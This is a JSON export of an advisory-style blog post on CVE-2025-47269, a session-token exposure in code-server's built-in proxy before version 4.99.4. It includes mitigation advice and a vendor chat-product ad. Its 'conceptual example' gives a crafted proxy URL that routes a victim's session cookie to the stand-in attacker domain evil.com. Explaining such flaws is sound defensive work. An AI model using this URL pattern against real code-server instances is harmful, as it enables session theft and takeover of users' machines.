{"id":39251,"date":"2025-05-18T01:23:25","date_gmt":"2025-05-18T01:23:25","guid":{"rendered":""},"modified":"2025-10-01T20:23:12","modified_gmt":"2025-10-02T02:23:12","slug":"cve-2025-47269-session-token-exposure-in-code-server-prior-to-version-4-99-4","status":"publish","type":"post","link":"https:\/\/www.ameeba.com\/blog\/cve-2025-47269-session-token-exposure-in-code-server-prior-to-version-4-99-4\/","title":{"rendered":"<strong>CVE-2025-47269: Session Token Exposure in code-server Prior to Version 4.99.4<\/strong>"},"content":{"rendered":"<p><strong>Overview<\/strong><\/p>\n<p>In the world of cybersecurity, the discovery and mitigation of vulnerabilities are paramount to sustaining a safe digital environment. One such vulnerability is CVE-2025-47269, affecting code-server, a popular tool that allows users to run Visual Studio Code on any machine through browser access. This vulnerability is significant due to the potential for malicious agents to access sensitive data, <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-30165-potential-system-compromise-in-vllm-v0-engine\/\"  data-wpil-monitor-id=\"44007\">potentially leading to system compromise<\/a> or data leakage.<\/p>\n<p><strong>Vulnerability Summary<\/strong><\/p>\n<p>CVE ID: CVE-2025-47269<br \/>\nSeverity: High (8.3 CVSS Score)<br \/>\nAttack Vector: Network (<a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-58361-xss-vulnerability-in-promptcraft-forge-studio-via-non-exhaustive-url-scheme-check\/\"  data-wpil-monitor-id=\"87052\">via crafted URL<\/a>)<br \/>\nPrivileges Required: None<br \/>\nUser Interaction: Required (victim needs to click on a malicious link)<br \/>\nImpact: System compromise, <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-45746-unauthorized-system-access-via-hardcoded-jwt-secret-in-zkt-zkbio-cvsecurity\/\"  data-wpil-monitor-id=\"48952\">Unauthorized Access<\/a>, Data Leakage<\/p>\n<p><strong>Affected Products<\/strong><\/p><div id=\"ameeb-1665534780\" class=\"ameeb-content-2 ameeb-entity-placement\"><div style=\"border-left: 4px solid #555; padding-left: 20px; margin: 48px 0; font-family: Roboto, sans-serif; color: #ffffff; line-height: 1.6; max-width: 720px;\">\r\n  <h2 style=\"margin-top: 0; font-size: 22px; font-weight: 600; display: flex; align-items: center; letter-spacing: -0.02em;\">\r\n    <a href=\"https:\/\/www.ameeba.com\/chat\" style=\"display: inline-flex; align-items: center; margin-right: 10px;\">\r\n      <img decoding=\"async\" src=\"https:\/\/www.ameeba.com\/blog\/wp-content\/uploads\/2025\/10\/Best-App-icon-Ameeba.png\" alt=\"Ameeba Chat Icon\" style=\"width: 42px; height: 42px;\" \/>\r\n    <\/a>\r\n    Share secrets securely\r\n  <\/h2>\r\n\r\n  <p style=\"margin-bottom: 14px; color: #d1d5db;\">\r\n    Ameeba is private infrastructure for communication and sensitive work built on encrypted identity instead of exposed corporate identity systems.\r\n  <\/p>\r\n\r\n  <p style=\"margin-bottom: 18px; color: #a1a1aa;\">\r\n    Passwords, credentials, confidential files, screenshots, internal discussions, sensitive AI context, and private coordination should not become exposed across ordinary communication platforms.\r\n  <\/p>\r\n\r\n  <ul style=\"list-style: none; padding-left: 0; margin-bottom: 24px; color: #e4e4e7;\">\r\n    <li style=\"margin-bottom: 8px;\">\u2022 Encrypted identity<\/li>\r\n    <li style=\"margin-bottom: 8px;\">\u2022 Private Spaces for organizations and teams<\/li>\r\n    <li style=\"margin-bottom: 8px;\">\u2022 End-to-end encrypted chat, calls, files, and notes<\/li>\r\n    <li style=\"margin-bottom: 8px;\">\u2022 Sensitive AI work and protected collaboration<\/li>\r\n    <li>\u2022 Built for information that cannot leak<\/li>\r\n  <\/ul>\r\n\r\n  <p style=\"font-style: italic; font-weight: 600; margin-bottom: 24px; color: #ffffff;\">\r\n    Our mission is to secure human work alongside AI.\r\n  <\/p>\r\n\r\n  <div style=\"display: flex; flex-wrap: wrap; gap: 12px;\">\r\n    <a href=\"https:\/\/www.ameeba.com\/chat\/download\" style=\"background-color: #ffffff; color: #000000; padding: 10px 20px; text-decoration: none; border-radius: 8px; font-weight: 500;\">\r\n      Download Ameeba\r\n    <\/a>\r\n\r\n    <a href=\"https:\/\/www.ameeba.com\/chat\" style=\"border: 1px solid #ffffff; color: #ffffff; padding: 10px 20px; text-decoration: none; border-radius: 8px; font-weight: 500;\">\r\n      Learn More\r\n    <\/a>\r\n  <\/div>\r\n<\/div><\/div>\n<p>Product | Affected Versions<\/p>\n<p>code-server | Prior to 4.99.4<\/p>\n<p><strong>How the Exploit Works<\/strong><\/p>\n<p>The <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-4366-request-smuggling-vulnerability-in-pingora-s-proxying-framework\/\"  data-wpil-monitor-id=\"56583\">vulnerability lies in the built-in proxy<\/a> feature of code-server. Prior to version 4.99.4, a lack of sufficient validation for proxy requests allows a <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-24189-memory-corruption-vulnerability-due-to-maliciously-crafted-web-content-in-various-operating-systems\/\"  data-wpil-monitor-id=\"56584\">maliciously crafted<\/a> URL to proxy a connection to an arbitrary domain. This URL could be structured to reference the attacker&#8217;s domain, enabling the <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-46827-graylog-open-log-management-platform-user-session-cookie-exposure\/\"  data-wpil-monitor-id=\"47626\">session cookie<\/a> to be sent to the attacker&#8217;s site. With the <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-47275-session-cookie-vulnerability-in-auth0-php-sdk\/\"  data-wpil-monitor-id=\"50455\">session cookie<\/a>, the attacker could log into the code-server and potentially gain full access to the host machine.<\/p>\n<p><strong>Conceptual Example Code<\/strong><\/p><div id=\"ameeb-3916989744\" class=\"ameeb-content ameeb-entity-placement\"><div class=\"poptin-embedded\" data-id=\"f6b387694f681\"><\/div>\r\n\r\n\r\n\r\n\r\n\r\n<\/div>\n<p>Consider the following URL, which an attacker could craft and distribute:<\/p>\n<pre><code class=\"\" data-line=\"\">https:\/\/&lt;code-server&gt;\/proxy\/test@evil.com\/path<\/code><\/pre>\n<p>In this scenario, the attacker&#8217;s domain is `evil.com`. When a user clicks on this URL, their connection would be proxied to `test@evil.com\/path`, and their session token would be sent along with it. This <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-49151-unauthenticated-attackers-can-forge-json-web-tokens-in-microsens-nmp-web\/\"  data-wpil-monitor-id=\"64546\">token could then be used by the attacker<\/a> to access the user&#8217;s code-server instance.<\/p>\n<p><strong>Mitigation and Recommendations<\/strong><\/p>\n<p>The developers behind code-server have addressed this issue in version 4.99.4. It is recommended to update your code-server to this version or later. If immediate updating is not possible, <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-31279-critical-permission-issue-allowing-user-fingerprinting-in-macos-and-ipados\/\"  data-wpil-monitor-id=\"81920\">users can temporarily mitigate the issue<\/a> by disabling the built-in proxy feature or implementing a Web Application Firewall (WAF) or Intrusion Detection System (IDS) to identify and block malicious requests. Always avoid clicking on links from <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-52709-high-risk-deserialization-of-untrusted-data-vulnerability-in-everest-forms\/\"  data-wpil-monitor-id=\"65277\">untrusted sources to reduce the risk<\/a> of exposure.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Overview In the world of cybersecurity, the discovery and mitigation of vulnerabilities are paramount to sustaining a safe digital environment. One such vulnerability is CVE-2025-47269, affecting code-server, a popular tool that allows users to run Visual Studio Code on any machine through browser access. This vulnerability is significant due to the potential for malicious agents [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"footnotes":""},"categories":[1],"tags":[],"vendor":[],"product":[],"attack_vector":[],"asset_type":[],"severity":[],"exploit_status":[],"class_list":["post-39251","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/39251","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/comments?post=39251"}],"version-history":[{"count":9,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/39251\/revisions"}],"predecessor-version":[{"id":79896,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/39251\/revisions\/79896"}],"wp:attachment":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/media?parent=39251"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/categories?post=39251"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/tags?post=39251"},{"taxonomy":"vendor","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/vendor?post=39251"},{"taxonomy":"product","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/product?post=39251"},{"taxonomy":"attack_vector","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/attack_vector?post=39251"},{"taxonomy":"asset_type","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/asset_type?post=39251"},{"taxonomy":"severity","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/severity?post=39251"},{"taxonomy":"exploit_status","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/exploit_status?post=39251"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}